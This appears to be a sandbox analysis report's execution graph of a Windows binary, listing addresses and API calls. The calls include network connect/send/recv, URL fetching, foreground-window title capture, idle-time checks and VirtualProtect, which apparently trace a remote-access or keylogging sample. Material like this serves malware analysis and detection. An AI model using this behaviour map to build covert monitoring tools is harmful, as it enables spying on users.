                                                Execution Coverage:5.7%
                                                Dynamic/Decrypted Code Coverage:19.5%
                                                Signature Coverage:3.4%
                                                Total number of Nodes:1533
                                                Total number of Limit Nodes:46
                                                execution_graph 53075 415d41 53090 41b411 53075->53090 53077 415d4a 53101 4020f6 53077->53101 53082 4170c4 53125 401e8d 53082->53125 53086 401fd8 11 API calls 53087 4170d9 53086->53087 53088 401fd8 11 API calls 53087->53088 53089 4170e5 53088->53089 53131 4020df 53090->53131 53095 41b456 InternetReadFile 53100 41b479 53095->53100 53096 41b4a6 InternetCloseHandle InternetCloseHandle 53098 41b4b8 53096->53098 53098->53077 53099 401fd8 11 API calls 53099->53100 53100->53095 53100->53096 53100->53099 53142 4020b7 53100->53142 53102 40210c 53101->53102 53103 4023ce 11 API calls 53102->53103 53104 402126 53103->53104 53105 402569 28 API calls 53104->53105 53106 402134 53105->53106 53107 404aa1 53106->53107 53108 404ab4 53107->53108 53209 40520c 53108->53209 53110 404ac9 ctype 53111 404b40 WaitForSingleObject 53110->53111 53112 404b20 53110->53112 53114 404b56 53111->53114 53113 404b32 send 53112->53113 53115 404b7b 53113->53115 53215 4210cb 54 API calls 53114->53215 53118 401fd8 11 API calls 53115->53118 53117 404b69 SetEvent 53117->53115 53119 404b83 53118->53119 53120 401fd8 11 API calls 53119->53120 53121 404b8b 53120->53121 53121->53082 53122 401fd8 53121->53122 53123 4023ce 11 API calls 53122->53123 53124 401fe1 53123->53124 53124->53082 53126 402163 53125->53126 53130 40219f 53126->53130 53233 402730 11 API calls 53126->53233 53128 402184 53234 402712 11 API calls std::_Deallocate 53128->53234 53130->53086 53132 4020e7 53131->53132 53148 4023ce 53132->53148 53134 4020f2 53135 43bda0 53134->53135 53140 4461b8 __Getctype 53135->53140 53136 4461f6 53164 44062d 20 API calls _Atexit 53136->53164 53137 4461e1 RtlAllocateHeap 53139 41b42f InternetOpenW InternetOpenUrlW 53137->53139 53137->53140 53139->53095 53140->53136 53140->53137 53163 443001 7 API calls 2 library calls 53140->53163 53143 4020bf 53142->53143 53144 4023ce 11 API calls 53143->53144 53145 4020ca 53144->53145 53165 40250a 53145->53165 53147 4020d9 53147->53100 53149 402428 53148->53149 53150 4023d8 53148->53150 53149->53134 53150->53149 53152 4027a7 53150->53152 53153 402e21 53152->53153 53156 4016b4 53153->53156 53155 402e30 53155->53149 53157 4016c6 53156->53157 53158 4016cb 53156->53158 53162 43bd68 11 API calls _Atexit 53157->53162 53158->53157 53159 4016f3 53158->53159 53159->53155 53161 43bd67 53162->53161 53163->53140 53164->53139 53166 40251a 53165->53166 53167 402520 53166->53167 53168 402535 53166->53168 53172 402569 53167->53172 53182 4028e8 53168->53182 53171 402533 53171->53147 53193 402888 53172->53193 53174 40257d 53175 402592 53174->53175 53176 4025a7 53174->53176 53198 402a34 22 API calls 53175->53198 53178 4028e8 28 API calls 53176->53178 53181 4025a5 53178->53181 53179 40259b 53199 4029da 22 API calls 53179->53199 53181->53171 53183 4028f1 53182->53183 53184 402953 53183->53184 53185 4028fb 53183->53185 53207 4028a4 22 API calls 53184->53207 53188 402904 53185->53188 53190 402917 53185->53190 53201 402cae 53188->53201 53189 402915 53189->53171 53190->53189 53192 4023ce 11 API calls 53190->53192 53192->53189 53194 402890 53193->53194 53195 402898 53194->53195 53200 402ca3 22 API calls 53194->53200 53195->53174 53198->53179 53199->53181 53202 402cb8 __EH_prolog 53201->53202 53208 402e54 22 API calls 53202->53208 53204 4023ce 11 API calls 53206 402d92 53204->53206 53205 402d24 53205->53204 53206->53189 53208->53205 53210 405214 53209->53210 53211 4023ce 11 API calls 53210->53211 53212 40521f 53211->53212 53216 405234 53212->53216 53214 40522e 53214->53110 53215->53117 53217 405240 53216->53217 53218 40526e 53216->53218 53219 4028e8 28 API calls 53217->53219 53232 4028a4 22 API calls 53218->53232 53221 40524a 53219->53221 53221->53214 53233->53128 53234->53130 53235 10006d60 53236 10006d69 53235->53236 53237 10006d72 53235->53237 53239 10006c5f 53236->53239 53259 10005af6 GetLastError 53239->53259 53241 10006c6c 53279 10006d7e 53241->53279 53243 10006c74 53288 100069f3 53243->53288 53246 10006c8b 53246->53237 53249 10006cce 53313 1000571e 19 API calls _free 53249->53313 53253 10006cc9 53312 10006368 19 API calls __dosmaperr 53253->53312 53255 10006d12 53255->53249 53315 100068c9 25 API calls 53255->53315 53256 10006ce6 53256->53255 53314 1000571e 19 API calls _free 53256->53314 53260 10005b12 53259->53260 53261 10005b0c 53259->53261 53265 10005b61 SetLastError 53260->53265 53317 1000637b 19 API calls 2 library calls 53260->53317 53316 10005e08 10 API calls 2 library calls 53261->53316 53264 10005b24 53266 10005b2c 53264->53266 53319 10005e5e 10 API calls 2 library calls 53264->53319 53265->53241 53318 1000571e 19 API calls _free 53266->53318 53268 10005b41 53268->53266 53270 10005b48 53268->53270 53320 1000593c 19 API calls _abort 53270->53320 53271 10005b32 53273 10005b6d SetLastError 53271->53273 53322 100055a8 36 API calls _abort 53273->53322 53274 10005b53 53321 1000571e 19 API calls _free 53274->53321 53278 10005b5a 53278->53265 53278->53273 53280 10006d8a ___DestructExceptionObject 53279->53280 53281 10005af6 _abort 36 API calls 53280->53281 53286 10006d94 53281->53286 53283 10006e18 _abort 53283->53243 53286->53283 53323 100055a8 36 API calls _abort 53286->53323 53324 10005671 RtlEnterCriticalSection 53286->53324 53325 1000571e 19 API calls _free 53286->53325 53326 10006e0f RtlLeaveCriticalSection _abort 53286->53326 53327 100054a7 53288->53327 53291 10006a14 GetOEMCP 53293 10006a3d 53291->53293 53292 10006a26 53292->53293 53294 10006a2b GetACP 53292->53294 53293->53246 53295 100056d0 53293->53295 53294->53293 53296 1000570e 53295->53296 53301 100056de _abort 53295->53301 53338 10006368 19 API calls __dosmaperr 53296->53338 53297 100056f9 RtlAllocateHeap 53299 1000570c 53297->53299 53297->53301 53299->53249 53302 10006e20 53299->53302 53301->53296 53301->53297 53337 1000474f 7 API calls 2 library calls 53301->53337 53303 100069f3 38 API calls 53302->53303 53304 10006e3f 53303->53304 53307 10006e90 IsValidCodePage 53304->53307 53309 10006e46 53304->53309 53311 10006eb5 ___scrt_fastfail 53304->53311 53306 10006cc1 53306->53253 53306->53256 53308 10006ea2 GetCPInfo 53307->53308 53307->53309 53308->53309 53308->53311 53349 10002ada 53309->53349 53339 10006acb GetCPInfo 53311->53339 53312->53249 53313->53246 53314->53255 53315->53249 53316->53260 53317->53264 53318->53271 53319->53268 53320->53274 53321->53278 53324->53286 53325->53286 53326->53286 53328 100054c4 53327->53328 53334 100054ba 53327->53334 53329 10005af6 _abort 36 API calls 53328->53329 53328->53334 53330 100054e5 53329->53330 53335 10007a00 36 API calls __fassign 53330->53335 53332 100054fe 53336 10007a2d 36 API calls __fassign 53332->53336 53334->53291 53334->53292 53335->53332 53336->53334 53337->53301 53338->53299 53345 10006b05 53339->53345 53348 10006baf 53339->53348 53342 10002ada _ValidateLocalCookies 5 API calls 53344 10006c5b 53342->53344 53344->53309 53356 100086e4 53345->53356 53347 10008a3e 41 API calls 53347->53348 53348->53342 53350 10002ae3 53349->53350 53351 10002ae5 IsProcessorFeaturePresent 53349->53351 53350->53306 53353 10002b58 53351->53353 53426 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53353->53426 53355 10002c3b 53355->53306 53357 100054a7 __fassign 36 API calls 53356->53357 53358 10008704 MultiByteToWideChar 53357->53358 53360 10008742 53358->53360 53368 100087da 53358->53368 53362 100056d0 20 API calls 53360->53362 53365 10008763 ___scrt_fastfail 53360->53365 53361 10002ada _ValidateLocalCookies 5 API calls 53363 10006b66 53361->53363 53362->53365 53370 10008a3e 53363->53370 53364 100087d4 53375 10008801 19 API calls _free 53364->53375 53365->53364 53367 100087a8 MultiByteToWideChar 53365->53367 53367->53364 53369 100087c4 GetStringTypeW 53367->53369 53368->53361 53369->53364 53371 100054a7 __fassign 36 API calls 53370->53371 53372 10008a51 53371->53372 53376 10008821 53372->53376 53375->53368 53377 1000883c 53376->53377 53378 10008862 MultiByteToWideChar 53377->53378 53379 10008a16 53378->53379 53380 1000888c 53378->53380 53381 10002ada _ValidateLocalCookies 5 API calls 53379->53381 53384 100056d0 20 API calls 53380->53384 53385 100088ad 53380->53385 53382 10006b87 53381->53382 53382->53347 53383 100088f6 MultiByteToWideChar 53386 1000890f 53383->53386 53398 10008962 53383->53398 53384->53385 53385->53383 53385->53398 53403 10005f19 53386->53403 53390 10008971 53392 10008992 53390->53392 53393 100056d0 20 API calls 53390->53393 53391 10008939 53395 10005f19 10 API calls 53391->53395 53391->53398 53394 10008a07 53392->53394 53397 10005f19 10 API calls 53392->53397 53393->53392 53411 10008801 19 API calls _free 53394->53411 53395->53398 53399 100089e6 53397->53399 53412 10008801 19 API calls _free 53398->53412 53399->53394 53400 100089f5 WideCharToMultiByte 53399->53400 53400->53394 53401 10008a35 53400->53401 53413 10008801 19 API calls _free 53401->53413 53414 10005c45 53403->53414 53405 10005f40 53406 10005f49 53405->53406 53418 10005fa1 9 API calls 2 library calls 53405->53418 53409 10002ada _ValidateLocalCookies 5 API calls 53406->53409 53408 10005f89 LCMapStringW 53408->53406 53410 10005f9b 53409->53410 53410->53390 53410->53391 53410->53398 53411->53398 53412->53379 53413->53398 53415 10005c71 53414->53415 53417 10005c75 __crt_fast_encode_pointer 53414->53417 53415->53417 53419 10005ce1 53415->53419 53417->53405 53418->53408 53420 10005d02 LoadLibraryExW 53419->53420 53421 10005cf7 53419->53421 53422 10005d37 53420->53422 53423 10005d1f GetLastError 53420->53423 53421->53415 53422->53421 53425 10005d4e FreeLibrary 53422->53425 53423->53422 53424 10005d2a LoadLibraryExW 53423->53424 53424->53422 53425->53421 53426->53355 53427 434906 53432 434bd8 SetUnhandledExceptionFilter 53427->53432 53429 43490b pre_c_initialization 53433 4455cc 20 API calls 2 library calls 53429->53433 53431 434916 53432->53429 53433->53431 53434 1000c7a7 53435 1000c7be 53434->53435 53440 1000c82c 53434->53440 53435->53440 53444 1000c7e6 GetModuleHandleA 53435->53444 53436 1000c872 53437 1000c835 GetModuleHandleA 53439 1000c83f 53437->53439 53439->53439 53439->53440 53440->53436 53440->53437 53445 1000c7ef 53444->53445 53451 1000c82c 53444->53451 53454 1000c803 53445->53454 53447 1000c872 53448 1000c835 GetModuleHandleA 53449 1000c83f 53448->53449 53449->53449 53449->53451 53451->53447 53451->53448 53455 1000c809 53454->53455 53456 1000c82c 53455->53456 53457 1000c80d VirtualProtect 53455->53457 53459 1000c835 GetModuleHandleA 53456->53459 53460 1000c872 53456->53460 53457->53456 53458 1000c81c VirtualProtect 53457->53458 53458->53456 53461 1000c83f 53459->53461 53461->53456 53462 43bea8 53465 43beb4 _swprintf CallCatchBlock 53462->53465 53463 43bec2 53478 44062d 20 API calls _Atexit 53463->53478 53465->53463 53466 43beec 53465->53466 53473 445909 EnterCriticalSection 53466->53473 53468 43bec7 pre_c_initialization CallCatchBlock 53469 43bef7 53474 43bf98 53469->53474 53473->53469 53475 43bfa6 53474->53475 53477 43bf02 53475->53477 53480 4497ec 37 API calls 2 library calls 53475->53480 53479 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 53477->53479 53478->53468 53479->53468 53480->53475 53481 4458c8 53483 4458d3 53481->53483 53484 4458fc 53483->53484 53485 4458f8 53483->53485 53487 448b04 53483->53487 53494 445920 DeleteCriticalSection 53484->53494 53495 44854a 53487->53495 53490 448b49 InitializeCriticalSectionAndSpinCount 53491 448b34 53490->53491 53502 43502b 53491->53502 53493 448b60 53493->53483 53494->53485 53496 448576 53495->53496 53497 44857a 53495->53497 53496->53497 53499 44859a 53496->53499 53509 4485e6 53496->53509 53497->53490 53497->53491 53499->53497 53500 4485a6 GetProcAddress 53499->53500 53501 4485b6 __crt_fast_encode_pointer 53500->53501 53501->53497 53503 435036 IsProcessorFeaturePresent 53502->53503 53504 435034 53502->53504 53506 435078 53503->53506 53504->53493 53516 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53506->53516 53508 43515b 53508->53493 53510 448607 LoadLibraryExW 53509->53510 53515 4485fc 53509->53515 53511 448624 GetLastError 53510->53511 53512 44863c 53510->53512 53511->53512 53513 44862f LoadLibraryExW 53511->53513 53514 448653 FreeLibrary 53512->53514 53512->53515 53513->53512 53514->53515 53515->53496 53516->53508 53517 41e04e 53518 41e063 ctype ___scrt_fastfail 53517->53518 53519 41e266 53518->53519 53520 432f55 21 API calls 53518->53520 53525 41e21a 53519->53525 53531 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 53519->53531 53524 41e213 ___scrt_fastfail 53520->53524 53522 41e277 53522->53525 53532 432f55 53522->53532 53524->53525 53526 432f55 21 API calls 53524->53526 53529 41e240 ___scrt_fastfail 53526->53529 53527 41e2b0 ___scrt_fastfail 53527->53525 53537 4335db 53527->53537 53529->53525 53530 432f55 21 API calls 53529->53530 53530->53519 53531->53522 53533 432f63 53532->53533 53534 432f5f 53532->53534 53535 43bda0 ___std_exception_copy 21 API calls 53533->53535 53534->53527 53536 432f68 53535->53536 53536->53527 53540 4334fa 53537->53540 53539 4335e3 53539->53525 53541 433513 53540->53541 53545 433509 53540->53545 53542 432f55 21 API calls 53541->53542 53541->53545 53543 433534 53542->53543 53543->53545 53546 4338c8 CryptAcquireContextA 53543->53546 53545->53539 53547 4338e9 CryptGenRandom 53546->53547 53548 4338e4 53546->53548 53547->53548 53549 4338fe CryptReleaseContext 53547->53549 53548->53545 53549->53548 53550 426c6d 53556 426d42 recv 53550->53556 53557 426a77 53558 426a8c 53557->53558 53570 426b1e 53557->53570 53559 426b83 53558->53559 53560 426bae 53558->53560 53563 426b0e 53558->53563 53567 426b4e 53558->53567 53569 426ad9 53558->53569 53558->53570 53571 426bd5 53558->53571 53585 424f6e 49 API calls ctype 53558->53585 53559->53560 53589 425781 21 API calls 53559->53589 53560->53570 53560->53571 53573 425b72 53560->53573 53563->53567 53563->53570 53587 424f6e 49 API calls ctype 53563->53587 53567->53559 53567->53570 53588 41fbfd 52 API calls 53567->53588 53569->53563 53569->53570 53586 41fbfd 52 API calls 53569->53586 53571->53570 53590 4261e6 28 API calls 53571->53590 53574 425b91 ___scrt_fastfail 53573->53574 53576 425ba0 53574->53576 53580 425bc5 53574->53580 53591 41ec4c 21 API calls 53574->53591 53576->53580 53584 425ba5 53576->53584 53592 420669 46 API calls 53576->53592 53579 425bae 53579->53580 53594 424d96 21 API calls 2 library calls 53579->53594 53580->53571 53582 425c48 53582->53580 53583 432f55 21 API calls 53582->53583 53583->53584 53584->53579 53584->53580 53593 41daf0 49 API calls 53584->53593 53585->53569 53586->53569 53587->53567 53588->53567 53589->53560 53590->53570 53591->53576 53592->53582 53593->53579 53594->53580 53595 4165db 53606 401e65 53595->53606 53597 4165eb 53598 4020f6 28 API calls 53597->53598 53599 4165f6 53598->53599 53600 401e65 22 API calls 53599->53600 53601 416601 53600->53601 53602 4020f6 28 API calls 53601->53602 53603 41660c 53602->53603 53611 412965 53603->53611 53607 401e6d 53606->53607 53608 401e75 53607->53608 53630 402158 22 API calls 53607->53630 53608->53597 53631 40482d 53611->53631 53613 412979 53638 4048c8 connect 53613->53638 53617 41299a 53703 402f10 53617->53703 53620 404aa1 61 API calls 53621 4129ae 53620->53621 53622 401fd8 11 API calls 53621->53622 53623 4129b6 53622->53623 53708 404c10 53623->53708 53626 401fd8 11 API calls 53627 4129cc 53626->53627 53628 401fd8 11 API calls 53627->53628 53629 4129d4 53628->53629 53632 404846 socket 53631->53632 53633 404839 53631->53633 53634 404860 CreateEventW 53632->53634 53635 404842 53632->53635 53726 40489e WSAStartup 53633->53726 53634->53613 53635->53613 53637 40483e 53637->53632 53637->53635 53639 404a1b 53638->53639 53640 4048ee 53638->53640 53641 40497e 53639->53641 53642 404a21 WSAGetLastError 53639->53642 53640->53641 53643 404923 53640->53643 53727 40531e 53640->53727 53698 402f31 53641->53698 53642->53641 53644 404a31 53642->53644 53762 420cf1 27 API calls 53643->53762 53646 404932 53644->53646 53647 404a36 53644->53647 53652 402093 28 API calls 53646->53652 53767 41cb72 30 API calls 53647->53767 53649 40490f 53732 402093 53649->53732 53651 40492b 53651->53646 53655 404941 53651->53655 53656 404a80 53652->53656 53654 404a40 53768 4052fd 28 API calls 53654->53768 53662 404950 53655->53662 53663 404987 53655->53663 53659 402093 28 API calls 53656->53659 53664 404a8f 53659->53664 53666 402093 28 API calls 53662->53666 53764 421ad1 54 API calls 53663->53764 53667 41b580 80 API calls 53664->53667 53670 40495f 53666->53670 53667->53641 53673 402093 28 API calls 53670->53673 53671 40498f 53674 4049c4 53671->53674 53675 404994 53671->53675 53677 40496e 53673->53677 53766 420e97 28 API calls 53674->53766 53679 402093 28 API calls 53675->53679 53682 41b580 80 API calls 53677->53682 53681 4049a3 53679->53681 53684 402093 28 API calls 53681->53684 53685 404973 53682->53685 53683 4049cc 53686 4049f9 CreateEventW CreateEventW 53683->53686 53688 402093 28 API calls 53683->53688 53687 4049b2 53684->53687 53763 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53685->53763 53686->53641 53689 41b580 80 API calls 53687->53689 53691 4049e2 53688->53691 53692 4049b7 53689->53692 53693 402093 28 API calls 53691->53693 53765 421143 52 API calls 53692->53765 53695 4049f1 53693->53695 53696 41b580 80 API calls 53695->53696 53697 4049f6 53696->53697 53697->53686 53699 4020df 11 API calls 53698->53699 53700 402f3d 53699->53700 53701 4032a0 28 API calls 53700->53701 53702 402f59 53701->53702 53702->53617 53819 401fb0 53703->53819 53705 402f1e 53706 402055 11 API calls 53705->53706 53707 402f2d 53706->53707 53707->53620 53709 4020df 11 API calls 53708->53709 53710 404c27 53709->53710 53711 4020df 11 API calls 53710->53711 53714 404c30 53711->53714 53712 43bda0 ___std_exception_copy 21 API calls 53712->53714 53714->53712 53715 4020b7 28 API calls 53714->53715 53716 404ca1 53714->53716 53720 401fd8 11 API calls 53714->53720 53822 404b96 53714->53822 53828 401fe2 53714->53828 53837 404cc3 53714->53837 53715->53714 53849 404e26 99 API calls 53716->53849 53719 404ca8 53721 401fd8 11 API calls 53719->53721 53720->53714 53722 404cb1 53721->53722 53723 401fd8 11 API calls 53722->53723 53724 404cba 53723->53724 53724->53626 53726->53637 53728 4020df 11 API calls 53727->53728 53729 40532a 53728->53729 53769 4032a0 53729->53769 53731 405346 53731->53649 53733 40209b 53732->53733 53734 4023ce 11 API calls 53733->53734 53735 4020a6 53734->53735 53773 4024ed 53735->53773 53738 41b580 53739 41b631 53738->53739 53740 41b596 GetLocalTime 53738->53740 53741 401fd8 11 API calls 53739->53741 53742 40531e 28 API calls 53740->53742 53743 41b639 53741->53743 53744 41b5d8 53742->53744 53745 401fd8 11 API calls 53743->53745 53777 406383 53744->53777 53748 41b641 53745->53748 53748->53643 53749 402f10 28 API calls 53750 41b5f0 53749->53750 53751 406383 28 API calls 53750->53751 53752 41b5fc 53751->53752 53782 40723b 77 API calls 53752->53782 53754 41b60a 53755 401fd8 11 API calls 53754->53755 53756 41b616 53755->53756 53757 401fd8 11 API calls 53756->53757 53758 41b61f 53757->53758 53759 401fd8 11 API calls 53758->53759 53760 41b628 53759->53760 53761 401fd8 11 API calls 53760->53761 53761->53739 53762->53651 53763->53641 53764->53671 53765->53685 53766->53683 53767->53654 53771 4032aa 53769->53771 53770 4032c9 53770->53731 53771->53770 53772 4028e8 28 API calls 53771->53772 53772->53770 53774 4024f9 53773->53774 53775 40250a 28 API calls 53774->53775 53776 4020b1 53775->53776 53776->53738 53783 4051ef 53777->53783 53779 406391 53787 402055 53779->53787 53782->53754 53784 4051fb 53783->53784 53793 405274 53784->53793 53786 405208 53786->53779 53788 402061 53787->53788 53789 4023ce 11 API calls 53788->53789 53790 40207b 53789->53790 53815 40267a 53790->53815 53794 405282 53793->53794 53795 405288 53794->53795 53796 40529e 53794->53796 53804 4025f0 53795->53804 53798 4052f5 53796->53798 53799 4052b6 53796->53799 53813 4028a4 22 API calls 53798->53813 53802 4028e8 28 API calls 53799->53802 53803 40529c 53799->53803 53802->53803 53803->53786 53805 402888 22 API calls 53804->53805 53806 402602 53805->53806 53807 402672 53806->53807 53808 402629 53806->53808 53814 4028a4 22 API calls 53807->53814 53810 4028e8 28 API calls 53808->53810 53812 40263b 53808->53812 53810->53812 53812->53803 53816 40268b 53815->53816 53817 4023ce 11 API calls 53816->53817 53818 40208d 53817->53818 53818->53749 53820 4025f0 28 API calls 53819->53820 53821 401fbd 53820->53821 53821->53705 53823 404ba0 WaitForSingleObject 53822->53823 53824 404bcd recv 53822->53824 53850 421107 54 API calls 53823->53850 53826 404be0 53824->53826 53826->53714 53827 404bbc SetEvent 53827->53826 53829 401ff1 53828->53829 53830 402039 53828->53830 53831 4023ce 11 API calls 53829->53831 53830->53714 53832 401ffa 53831->53832 53833 40203c 53832->53833 53835 402015 53832->53835 53834 40267a 11 API calls 53833->53834 53834->53830 53851 403098 28 API calls 53835->53851 53838 4020df 11 API calls 53837->53838 53848 404cde 53838->53848 53839 404e13 53840 401fd8 11 API calls 53839->53840 53841 404e1c 53840->53841 53841->53714 53842 4041a2 28 API calls 53842->53848 53843 401fe2 28 API calls 53843->53848 53844 401fd8 11 API calls 53844->53848 53845 4020f6 28 API calls 53845->53848 53848->53839 53848->53842 53848->53843 53848->53844 53848->53845 53852 401fc0 53848->53852 53849->53719 53850->53827 53851->53830 53853 401fd2 CreateEventA CreateThread WaitForSingleObject CloseHandle 53852->53853 53854 401fc9 53852->53854 53853->53848 53857 415b25 53853->53857 53856 4025e0 28 API calls 53854->53856 53856->53853 53858 4020f6 28 API calls 53857->53858 53859 415b47 SetEvent 53858->53859 53860 415b5c 53859->53860 53936 4041a2 53860->53936 53863 4020f6 28 API calls 53864 415b86 53863->53864 53865 4020f6 28 API calls 53864->53865 53866 415b98 53865->53866 53939 41beac 53866->53939 53869 415bc1 GetTickCount 53961 41bc1f 53869->53961 53870 415d20 53933 415d11 53870->53933 53934 415d34 53870->53934 53871 401e8d 11 API calls 53873 4170cd 53871->53873 53876 401fd8 11 API calls 53873->53876 53878 4170d9 53876->53878 53880 401fd8 11 API calls 53878->53880 53879 415bde 53882 41bc1f 28 API calls 53879->53882 53881 4170e5 53880->53881 53883 415be9 53882->53883 53967 41bb27 53883->53967 53888 401e65 22 API calls 53889 415c13 53888->53889 53890 402f31 28 API calls 53889->53890 53891 415c21 53890->53891 53976 402ea1 28 API calls 53891->53976 53893 415c30 53894 402f10 28 API calls 53893->53894 53895 415c3f 53894->53895 53977 402ea1 28 API calls 53895->53977 53897 415c4e 53898 402f10 28 API calls 53897->53898 53899 415c5a 53898->53899 53978 402ea1 28 API calls 53899->53978 53901 415c64 53902 404aa1 61 API calls 53901->53902 53903 415c73 53902->53903 53904 401fd8 11 API calls 53903->53904 53905 415c7c 53904->53905 53906 401fd8 11 API calls 53905->53906 53907 415c88 53906->53907 53908 401fd8 11 API calls 53907->53908 53909 415c94 53908->53909 53910 401fd8 11 API calls 53909->53910 53911 415ca0 53910->53911 53912 401fd8 11 API calls 53911->53912 53913 415cac 53912->53913 53914 401fd8 11 API calls 53913->53914 53915 415cb8 53914->53915 53979 401f09 53915->53979 53918 401fd8 11 API calls 53919 415cca 53918->53919 53920 401fd8 11 API calls 53919->53920 53921 415cd3 53920->53921 53922 401e65 22 API calls 53921->53922 53923 415cde 53922->53923 53982 43bb2c 53923->53982 53926 415cf0 53929 415d09 53926->53929 53930 415cfe 53926->53930 53927 415d16 53928 401e65 22 API calls 53927->53928 53928->53870 53987 404f51 53929->53987 53986 404ff4 82 API calls 53930->53986 53933->53871 54002 4050e4 84 API calls 53934->54002 53935 415d04 53935->53933 54003 40423a 53936->54003 53940 4020df 11 API calls 53939->53940 53960 41bebf 53940->53960 53941 41bf2f 53942 401fd8 11 API calls 53941->53942 53943 41bf61 53942->53943 53945 401fd8 11 API calls 53943->53945 53944 41bf31 53946 4041a2 28 API calls 53944->53946 53948 41bf69 53945->53948 53949 41bf3d 53946->53949 53947 4041a2 28 API calls 53947->53960 53950 401fd8 11 API calls 53948->53950 53951 401fe2 28 API calls 53949->53951 53953 415ba1 53950->53953 53954 41bf46 53951->53954 53952 401fe2 28 API calls 53952->53960 53953->53869 53953->53870 53953->53933 53955 401fd8 11 API calls 53954->53955 53957 41bf4e 53955->53957 53956 401fd8 11 API calls 53956->53960 53958 41cec5 28 API calls 53957->53958 53958->53941 53960->53941 53960->53944 53960->53947 53960->53952 53960->53956 54009 41cec5 53960->54009 54045 441ed1 53961->54045 53964 402093 28 API calls 53965 415bd2 53964->53965 53966 41bb77 GetLastInputInfo GetTickCount 53965->53966 53966->53879 54054 436f10 53967->54054 53972 41bdaf 53973 41bdbc 53972->53973 53974 4020b7 28 API calls 53973->53974 53975 415c05 53974->53975 53975->53888 53976->53893 53977->53897 53978->53901 53980 402252 11 API calls 53979->53980 53981 401f12 53980->53981 53981->53918 53983 43bb45 _strftime 53982->53983 54108 43ae83 53983->54108 53985 415ceb 53985->53926 53985->53927 53986->53935 53988 404f65 53987->53988 53989 404fea 53987->53989 53990 404f6e 53988->53990 53991 404fc0 CreateEventA CreateThread 53988->53991 53992 404f7d GetLocalTime 53988->53992 53989->53933 53990->53991 53991->53989 54179 405150 53991->54179 53993 41bc1f 28 API calls 53992->53993 53994 404f91 53993->53994 54178 4052fd 28 API calls 53994->54178 54002->53935 54004 404243 54003->54004 54005 4023ce 11 API calls 54004->54005 54006 40424e 54005->54006 54007 402569 28 API calls 54006->54007 54008 4041b5 54007->54008 54008->53863 54010 41ced2 54009->54010 54011 41cf31 54010->54011 54015 41cee2 54010->54015 54012 41cf4b 54011->54012 54013 41d071 28 API calls 54011->54013 54029 41d1d7 28 API calls 54012->54029 54013->54012 54016 41cf1a 54015->54016 54020 41d071 54015->54020 54028 41d1d7 28 API calls 54016->54028 54019 41cf2d 54019->53960 54022 41d079 54020->54022 54021 41d0ab 54021->54016 54022->54021 54023 41d0af 54022->54023 54026 41d093 54022->54026 54040 402725 22 API calls 54023->54040 54030 41d0e2 54026->54030 54028->54019 54029->54019 54031 41d0ec __EH_prolog 54030->54031 54041 402717 22 API calls 54031->54041 54033 41d0ff 54042 41d1ee 11 API calls 54033->54042 54035 41d125 54036 41d15d 54035->54036 54043 402730 11 API calls 54035->54043 54036->54021 54038 41d144 54044 402712 11 API calls std::_Deallocate 54038->54044 54041->54033 54042->54035 54043->54038 54044->54036 54046 441edd 54045->54046 54049 441ccd 54046->54049 54048 41bc43 54048->53964 54050 441ce4 54049->54050 54052 441d1b pre_c_initialization 54050->54052 54053 44062d 20 API calls _Atexit 54050->54053 54052->54048 54053->54052 54055 41bb46 GetForegroundWindow GetWindowTextW 54054->54055 54056 40417e 54055->54056 54057 404186 54056->54057 54062 402252 54057->54062 54059 404191 54066 4041bc 54059->54066 54063 40225c 54062->54063 54064 4022ac 54062->54064 54063->54064 54070 402779 11 API calls std::_Deallocate 54063->54070 54064->54059 54067 4041c8 54066->54067 54071 4041d9 54067->54071 54069 40419c 54069->53972 54070->54064 54072 4041e9 54071->54072 54073 404206 54072->54073 54074 4041ef 54072->54074 54088 4027e6 54073->54088 54078 404267 54074->54078 54077 404204 54077->54069 54079 402888 22 API calls 54078->54079 54080 40427b 54079->54080 54081 404290 54080->54081 54082 4042a5 54080->54082 54099 4042df 22 API calls 54081->54099 54083 4027e6 28 API calls 54082->54083 54087 4042a3 54083->54087 54085 404299 54100 402c48 22 API calls 54085->54100 54087->54077 54089 4027ef 54088->54089 54090 402851 54089->54090 54091 4027f9 54089->54091 54107 4028a4 22 API calls 54090->54107 54094 402802 54091->54094 54095 402815 54091->54095 54101 402aea 54094->54101 54097 402813 54095->54097 54098 402252 11 API calls 54095->54098 54097->54077 54098->54097 54099->54085 54100->54087 54102 402af4 __EH_prolog 54101->54102 54103 402e45 22 API calls 54102->54103 54104 402b60 54103->54104 54105 402252 11 API calls 54104->54105 54106 402bce 54105->54106 54106->54097 54124 43ba8a 54108->54124 54110 43aed0 54130 43a837 54110->54130 54111 43ae95 54111->54110 54112 43aeaa 54111->54112 54123 43aeaf pre_c_initialization 54111->54123 54129 44062d 20 API calls _Atexit 54112->54129 54116 43aedc 54117 43af0b 54116->54117 54138 43bacf 40 API calls __Tolower 54116->54138 54120 43af77 54117->54120 54139 43ba36 20 API calls 2 library calls 54117->54139 54140 43ba36 20 API calls 2 library calls 54120->54140 54121 43b03e _strftime 54121->54123 54141 44062d 20 API calls _Atexit 54121->54141 54123->53985 54125 43baa2 54124->54125 54126 43ba8f 54124->54126 54125->54111 54142 44062d 20 API calls _Atexit 54126->54142 54128 43ba94 pre_c_initialization 54128->54111 54129->54123 54131 43a854 54130->54131 54132 43a84a 54130->54132 54131->54132 54143 448295 GetLastError 54131->54143 54132->54116 54134 43a875 54164 4483e4 36 API calls __Getctype 54134->54164 54136 43a88e 54165 448411 36 API calls __cftof 54136->54165 54138->54116 54139->54120 54140->54121 54141->54123 54142->54128 54144 4482b7 54143->54144 54145 4482ab 54143->54145 54167 445b74 20 API calls 3 library calls 54144->54167 54166 44883c 11 API calls 2 library calls 54145->54166 54148 4482b1 54148->54144 54150 448300 SetLastError 54148->54150 54149 4482c3 54151 4482cb 54149->54151 54174 448892 11 API calls 2 library calls 54149->54174 54150->54134 54168 446802 54151->54168 54153 4482e0 54153->54151 54156 4482e7 54153->54156 54155 4482d1 54157 44830c SetLastError 54155->54157 54175 448107 20 API calls __Getctype 54156->54175 54176 446175 36 API calls 4 library calls 54157->54176 54159 4482f2 54161 446802 _free 20 API calls 54159->54161 54163 4482f9 54161->54163 54162 448318 54163->54150 54163->54157 54164->54136 